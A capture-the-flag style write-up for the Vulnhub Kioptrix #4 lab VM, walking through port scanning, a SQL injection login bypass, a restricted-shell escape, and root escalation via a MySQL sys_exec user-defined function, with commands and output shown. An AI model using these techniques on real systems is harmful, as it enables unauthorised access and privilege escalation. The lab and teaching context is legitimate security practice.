Vulnhub - Kioptrix #4 Writeup

6 minute read

Vulnhub - Kioptrix #4

Enumeration

Lets add kioptrix4.com to hosts file and start with Nmap

Nmap

Nmap scan report for www.kioptrix4.com (192.168.174.6)
Host is up, received arp-response (0.00023s latency).
Scanned at 2020-02-08 07:49:18 EST for 33s
Not shown: 566 closed ports, 430 filtered ports
Reason: 566 resets and 430 no-responses
PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
80/tcp  open  http        syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 08:00:27:01:71:2D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h29m56s, deviation: 3h32m08s, median: -4s
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX4<00>        Flags: <unique><active>
|   KIOPTRIX4<03>        Flags: <unique><active>
|   KIOPTRIX4<20>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 45228/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 17840/tcp): CLEAN (Timeout)
|   Check 3 (port 22442/udp): CLEAN (Failed to receive data)
|   Check 4 (port 19869/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2020-02-08T07:49:28-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb  8 07:49:52 2020 -- 1 IP address (1 host up) scanned in 34.69 seconds

Let’s check out the web application that is running on port 80.

image1

DirBuster

http://kioptrix4.com:80
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/
/index/
/images/
/icons/
/john/
/robert/

Dirs found with a 403 response:

/cgi-bin/
/doc/

Dirs found with a 302 response:

/member/
/logout/


--------------------------------
Files found during testing:

Files found with a 200 responce:

/index.php
/checklogin.php

Files found with a 302 responce:

/member.php
/logout.php
/john/john.php
/robert/robert.php

DirBuster found 2 pages named john.php and robert.php. But accessing these pages, redirects us to the login page. So john and robert must be two users on this web application.

Sql Injection

The password field is prone to sql injection as it is throwing errors when we add ' as input.

image1

Lets try sql authentication bypass by using the following payload.

' or 1=1#

image1

And we are greeted with username and password. So the backend SQL Query must be something like this

SELECT * FROM users where username='john' and password='1' or '1'='1'

Low Shell

Let’s SSH into the box using the creds we got.

kali@kali:~$ ssh john@kioptrix4.com
john@kioptrix4.com's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ id
*** unknown command: id
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ lpath
Allowed:
 /home/john

On login we are greeted with a restricted shell. This shell essentially limits the commands user can use.

Alright so we can try breaking out from this shell. There are lot of techniques that can be used to escape restricted shells.

We can break out using the following command.

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)

Low Shell Enumeration

Found MySQL creds from checklogin.php file

  1. We can connect to MySLQL as root without password. 
    john@Kioptrix4:~$ cat /var/www/checklogin.php 
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
  2. MySQL is running as root 
    root      4034  0.0  0.1   1772   524 ?        S    01:32   0:00 /bin/sh /usr/bin/mysqld_safe
root      4076  0.0  4.6 127140 16452 ?        Sl   01:32   0:07 /usr/sbin/mysqld   
                 --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid 
                 --skip-external-locking --port=3306 --socket=/var/run/mysqld/my
root      4078  0.0  0.1   1700   556 ?        S    01:32   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld

Since MySQL is running as root, can use it to escalate our privilege to root using a MySQL UDF or User Defined Function.

Root Shell

So essentially we can execute command as root using sys_exec.

Let’s connect to MySQL and try it out.

john@Kioptrix4:~$ mysql -h localhost -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.


mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| members            | 
| mysql              | 
+--------------------+
3 rows in set (0.01 sec)

mysql> select sys_exec('touch /root/test');
+------------------------------+
| sys_exec('touch /root/test') |
+------------------------------+
| NULL                         | 
+------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye
john@Kioptrix4:~$ cd /root
john@Kioptrix4:/root$ ls
congrats.txt  lshell-0.9.12  test

So we can see that we have successfully created a file in root directory. So lets change group of john to admin.

john@Kioptrix4:~$ mysql -h localhost -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 13
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| members            | 
| mysql              | 
+--------------------+
3 rows in set (0.00 sec)

mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.04 sec)

mysql> exit
Bye
john@Kioptrix4:~$ sudo su
[sudo] password for john: 
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john# cat /root/congrats.txt 
Congratulations!
You've got root.

There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret

root@Kioptrix4:/home/john#

And we are root!

Afterthoughts

It was an easy box but required some out of the box thinking. This was my first time experience with restricted shell and MySQL UDF code execution, so it was a good learning experience.

Further Reading

  1. Restricted Shells Escape.
  2. MySQL UDF command execution.

Tags:

Categories:

Updated:

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.